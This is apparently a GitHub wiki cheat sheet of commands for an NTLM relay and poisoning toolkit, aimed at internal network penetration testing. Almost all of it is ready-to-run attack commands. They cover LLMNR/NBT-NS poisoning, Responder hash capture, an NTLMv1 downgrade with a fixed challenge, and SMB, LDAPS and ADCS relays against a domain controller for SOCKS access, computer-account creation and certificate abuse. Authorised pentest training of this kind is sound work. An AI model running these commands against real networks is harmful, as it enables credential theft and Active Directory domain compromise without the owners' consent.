Standard attacks - oscpname/RELAY_scenarios GitHub Wiki

MANUAL: https://github.com/nullenc0de/relaytoolkit

Tools:

  • toolkit

Attack - Initial Access testing:

#Start with analyze mode to identify opportunities:
sudo python3 toolkit.py --auto --analyze -i eth0
#Run full auto sequence when ready:
sudo python3 toolkit.py --auto -i eth0 -dc 192.168.1.10 -d corp.local
#Monitor captured hashes in Responder logs:
tail -f /usr/share/responder/logs/SMB-NTLMv2-SSP-192.168.1.10.txt

Under the hood:


Commands:

Auto mode

# Full automatic testing
sudo python3 toolkit.py --auto \
    -i eth0 \
    -dc 192.168.1.10 \
    -d corp.local \
    --target-range 192.168.1.0/24

# Analysis mode only (no poisoning)
sudo python3 toolkit.py --auto --analyze -i eth0

Basic collection

# Start hash collection
sudo python3 toolkit.py -i eth0

# With NTLM downgrade
sudo python3 toolkit.py -i eth0 -c 1122334455667788

SMB Relay

# SMB relay with SOCKS
sudo python3 toolkit.py -i eth0 --relay --relay-type smb --socks

# LDAPS relay for computer account creation
sudo python3 toolkit.py -i eth0 --relay --relay-type ldaps --dc-ip 192.168.1.10

# ADCS relay
sudo python3 toolkit.py -i eth0 --relay --relay-type adcs --dc-ip 192.168.1.10